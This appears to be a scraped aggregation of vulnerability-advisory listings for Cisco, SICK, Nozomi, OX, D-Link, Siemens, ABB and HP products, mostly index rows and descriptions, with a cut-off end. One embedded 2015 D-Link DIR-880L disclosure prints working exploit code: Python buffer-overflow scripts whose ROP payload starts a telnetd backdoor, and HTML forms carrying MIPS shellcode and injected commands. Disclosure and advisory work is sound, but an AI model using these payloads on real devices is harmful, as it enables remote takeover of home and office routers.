cisco-sa-asaftd-ssltls-dos-ehw76vze Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software SSL/TLS Certificate Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-19T16:32:05+00:00
cisco-sa-ftd-ravpn-geobypass-9h38m37z Cisco Secure Firewall Threat Defense Software Geolocation Remote Access VPN Bypass Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
sca-2025-0009 Vulnerabilities affecting SICK TDC-E210GC 2025-08-01T13:00:00.000Z 2025-08-01T13:00:00.000Z
sca-2025-0008 Multiple vulnerabilities in Endress+Hauser MEAC300-FNADE4 2025-07-03T13:00:00.000Z 2025-07-03T13:00:00.000Z
sca-2025-0007 Multiple vulnerabilities in SICK Field Analytics and SICK Media Server 2025-06-12T13:00:00.000Z 2025-06-12T13:00:00.000Z
sca-2025-0003 FreeRTOS Vulnerabilities have no impact on SICK Products 2025-02-28T00:00:00.000Z 2025-05-20T11:00:00.000Z
sca-2025-0006 Vulnerability affecting picoScan and multiScan 2025-04-28T13:00:00.000Z 2025-04-28T13:00:00.000Z
sca-2025-0005 Vulnerabilities in SICK Flexi Compact 2025-04-28T10:00:00.000Z 2025-04-28T10:00:00.000Z
sca-2025-0004 Critical vulnerabilities in SICK DL100-2xxxxxxx 2025-03-14T11:00:00.000Z 2025-03-14T11:00:00.000Z
sca-2025-0001 Multiple vulnerabilities in SICK MEAC300 2025-02-14T14:00:00.000Z 2025-02-21T14:00:00.000Z
sca-2025-0002 Vulnerability in SICK Lector8xx and SICK InspectorP8xx 2025-02-14T10:19:00.000Z 2025-02-14T10:19:00.000Z
sca-2024-0007 Vulnerability in SICK OLM 2024-12-31T00:00:00.000Z 2024-12-31T00:00:00.000Z
sca-2024-0006 Critical vulnerabilities in SICK InspectorP61x, InspectorP62x and TiM3xx 2024-12-06T00:00:00.000Z 2024-12-06T00:00:00.000Z
sca-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
SCA-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
sca-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
SCA-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
sca-2024-0003 Critical vulnerability in multiple SICK products 2024-10-17T13:00:00.000Z 2024-10-17T13:00:00.000Z
sca-2024-0002 Vulnerability in SICK MSC800 2024-09-11T23:00:00.000Z 2024-09-11T23:00:00.000Z
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 2024-01-29T00:00:00.000Z 2024-01-29T00:00:00.000Z
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
SCA-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
SCA-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
sca-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
SCA-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
SCA-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
sca-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
SCA-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
sca-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
SCA-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2025:3-01 Incorrect authorization for traces request/download in CMC before 25.1.0 2025-08-26T11:00:00.000Z 2025-08-26T11:00:00.000Z
nn-2025:2-01 Privilege escalation in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2025:1-01 Authenticated RCE in update functionality in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2024_2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
oxas-adv-2025-0001 OX App Suite Security Advisory OXAS-ADV-2025-0001 2025-01-27T00:00:00+01:00 2025-04-07T00:00:00+00:00
oxdc-adv-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxas-adv-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
OXAS-ADV-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
OXDC-ADV-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
oxas-adv-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202411-1650 D-LINK DI-8400 v16.07.26A1 was discovered to contain multiple remote command execution (RCE) vulnerabilities in the msp_info_htm function via the flag and cmd parameters. D-LINK DI-8400 is a router device from D-Link, USA, used for home and small business network connections. Remote attackers can exploit this vulnerability to execute arbitrary commands
var-202411-1640 Linksys E3000 is a powerful dual-band Wireless-N router from Linksys, an American company. There is a security vulnerability in diag_ping_start of Linksys E3000. A remote attacker can use this vulnerability to submit special requests and execute arbitrary commands in the context of the application.
var-202411-0543 A vulnerability has been identified in SIMATIC S7-PLCSIM V16 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 Safety V16 (All versions), SIMATIC STEP 7 Safety V17 (All versions < V17 Update 8), SIMATIC STEP 7 Safety V18 (All versions < V18 Update 5), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions < V17 Update 8), SIMATIC STEP 7 V18 (All versions < V18 Update 5), SIMATIC WinCC Unified V16 (All versions), SIMATIC WinCC Unified V17 (All versions < V17 Update 8), SIMATIC WinCC Unified V18 (All versions < V18 Update 5), SIMATIC WinCC V16 (All versions), SIMATIC WinCC V17 (All versions < V17 Update 8), SIMATIC WinCC V18 (All versions < V18 Update 5), SIMOCODE ES V16 (All versions), SIMOCODE ES V17 (All versions < V17 Update 8), SIMOCODE ES V18 (All versions), SIMOTION SCOUT TIA V5.4 SP1 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SINAMICS Startdrive V16 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SIRIUS Safety ES V17 (All versions < V17 Update 8), SIRIUS Safety ES V18 (All versions), SIRIUS Soft Starter ES V17 (All versions < V17 Update 8), SIRIUS Soft Starter ES V18 (All versions), TIA Portal Cloud V16 (All versions), TIA Portal Cloud V17 (All versions < V4.6.0.1), TIA Portal Cloud V18 (All versions < V4.6.1.0). Affected products do not properly sanitize user-controllable input when parsing user settings. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. SIMATIC S7-PLCSIM simulates S7-1200, S7-1500 and some other PLC derivatives, shipped as part of SIMATIC STEP 7. SIMATIC step7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. simmocode ES is the core software package for simmocode pro configuration, commissioning, operation and diagnostics. SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in TIA Portal. TIA Portal is a PC software that provides the full range of Siemens digital automation services from digital planning and integrated engineering to transparent operation. TIA Portal Cloud makes it possible to use the main package and main option package of TIA Portal in a virtualized environment
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com) . ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IpAddress parameters of the ABB BeMMS OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland. Failed exploit attempts will result in denial-of-service conditions
var-202411-1422 D-Link DI-8200 16.07.26A1 is vulnerable to remote command execution in the msp_info_htm function via the flag parameter and cmd parameter. D-Link Systems, Inc. of di-8200 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DI-8200 is an enterprise-class router from D-Link, a Chinese company. No detailed vulnerability details are currently available
var-202411-1539 D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the host_ip parameter in the ipsec_road_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-LINK DI-8003 is a router product produced by D-LINK. No detailed vulnerability details are currently provided
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-202410-3364 In TP-Link TL-WDR7660 v1.0, the guestRuleJsonToBin function handles the parameter string name without checking it, which can lead to stack overflow vulnerabilities. TP-LINK TL-WDR7660 is a Gigabit router from TP-LINK of China. TP-LINK TL-WDR7660 version 1.0 has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service
var-202411-1441 D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the notify parameter in the arp_sys_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-Link DI-8400 is a wireless router from D-Link, a Chinese company. D-Link DI-8400 arp_sys_asp has a buffer overflow vulnerability, which can be exploited by remote attackers to submit special requests, causing the service program to crash or execute arbitrary code in the context of the application
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security 